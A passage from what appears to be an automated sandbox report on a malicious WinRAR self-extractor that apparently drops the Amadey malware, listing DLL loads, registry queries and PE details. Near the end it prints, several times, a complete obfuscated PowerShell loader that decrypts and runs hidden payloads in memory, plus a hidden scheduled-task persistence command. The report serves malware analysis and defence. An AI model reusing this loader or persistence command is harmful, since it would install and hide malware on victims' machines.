Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: jcgLYlM4dg.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: jcgLYlM4dg.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: jcgLYlM4dg.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: jcgLYlM4dg.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: jcgLYlM4dg.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: jcgLYlM4dg.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: jcgLYlM4dg.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: jcgLYlM4dg.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: jcgLYlM4dg.exe

Source: jcgLYlM4dg.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: jcgLYlM4dg.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: jcgLYlM4dg.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: jcgLYlM4dg.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: jcgLYlM4dg.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_958_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_958.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_958_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_958.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 